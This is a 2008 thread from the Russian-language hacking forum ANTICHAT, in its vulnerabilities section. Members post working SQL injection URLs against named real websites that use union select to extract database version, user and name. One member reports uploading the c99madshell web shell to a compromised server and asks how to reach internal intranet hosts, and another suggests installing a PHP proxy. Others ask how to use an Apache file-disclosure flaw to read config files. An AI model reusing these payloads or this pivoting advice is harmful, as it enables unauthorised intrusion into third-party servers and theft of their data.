HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.08.2008, 15:39
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

Просто не ставь в конце /*
http://trinitysquarevideo.com/exhibition.php?id=-2+union+select+1,2,3,version(),5,6,7,8,9,10
 
Ответить с цитированием

  #2  
Старый 19.08.2008, 16:56
Elephant
Новичок
Регистрация: 31.07.2008
Сообщений: 11
Провел на форуме:
39796

Репутация: -3
Отправить сообщение для Elephant с помощью ICQ Отправить сообщение для Elephant с помощью MSN Отправить сообщение для Elephant с помощью Yahoo
По умолчанию

Плохо разбираюсь в MSSQL+asp что эт за ошибка, и есть ли тут уязвимость?

_http://www.itouch.ru/price.asp?r=261'
 
Ответить с цитированием

  #3  
Старый 19.08.2008, 18:17
Shaitan-Devil
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843

Репутация: 204
По умолчанию

Цитата:
Сообщение от Elephant  
Плохо разбираюсь в MSSQL+asp что эт за ошибка, и есть ли тут уязвимость?

_http://www.itouch.ru/price.asp?r=261'
Нету здесь скули

Последний раз редактировалось Shaitan-Devil; 19.08.2008 в 18:30..
 
Ответить с цитированием

  #4  
Старый 19.08.2008, 20:08
eLWAux
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию

http://gta.co.ua/file_sa_details.phtml?id=-1+union+select+1,2,3,4,5,6,7,user(),database(),ver sion(),11,12,13,14,15,16,17,18,19,20/*
 
Ответить с цитированием

через сервер с c99madshell - на http ресурсы интранета
  #5  
Старый 19.08.2008, 23:38
fervex
Новичок
Регистрация: 12.11.2007
Сообщений: 25
Провел на форуме:
36633

Репутация: 3
По умолчанию через сервер с c99madshell - на http ресурсы интранета

Здравствуйте!

Подскажите:

залил c99madshell на сервер, этот сервер входит в интранет, где есть другие серверы, на которые из интранета можно попасть по http://, а из интернета - нельзя.

Подскажите, есть ли какой-нибудь броузер на php, которые можно было бы залить на сервер и через этот броузер уже от имени сервера (IP) заходить на другие сервера интранета?

Или как-то ещё можно попасть на http интранета?


Спасибо!
 
Ответить с цитированием

  #6  
Старый 20.08.2008, 09:59
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043

Репутация: 137
По умолчанию

Цитата:
Сообщение от fervex  
Здравствуйте!

Подскажите:

залил c99madshell на сервер, этот сервер входит в интранет, где есть другие серверы, на которые из интранета можно попасть по http://, а из интернета - нельзя.

Подскажите, есть ли какой-нибудь броузер на php, которые можно было бы залить на сервер и через этот броузер уже от имени сервера (IP) заходить на другие сервера интранета?

Или как-то ещё можно попасть на http интранета?


Спасибо!
поставь проксю https://sourceforge.net/projects/phpproxy/

или можешь настроить редирект

Последний раз редактировалось nicusor; 20.08.2008 в 10:01..
 
Ответить с цитированием

  #7  
Старый 20.08.2008, 06:46
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

А какая религия запрещает изучить командную строку?
 
Ответить с цитированием

  #8  
Старый 20.08.2008, 15:39
sher_or_wer
Новичок
Регистрация: 13.08.2008
Сообщений: 6
Провел на форуме:
27688

Репутация: 0
По умолчанию

дело не в командной строке я ее знаю более или менее. Человек всегда ищет легкие решения для своих проблем.

З.Ы. По советуйце где есть информация о расположении папок в nix системах.

Последний раз редактировалось sher_or_wer; 20.08.2008 в 15:42..
 
Ответить с цитированием

  #9  
Старый 20.08.2008, 16:00
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

Нашол уязв

Просмотр запрещенных файлов

Ссылка - http://***.com/<<<<<<<<<<<<
Описание уязвимости : просмотр запрещенных файлов

Уязвимость Apache позволяет злоумышленнику читать недоступные файлы, путем прибавления символа "<" к запросу этих файлов.

Решение:

Установите последнюю версию.
http://www.apache.org/

Ссылки:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0017
http://www.apacheweek.com/issues/03-01-24#security

А как ее юзать не знаю подскажите к примеру как прочитать конфиг.пхп
 
Ответить с цитированием

  #10  
Старый 20.08.2008, 17:22
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

Всем прива!
Тема актуальная! Подскажите пожалуйста чем можно по joomla по каталогам шарить я для этого использую joomla xplorer, что есть еще мож что по лучше))))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ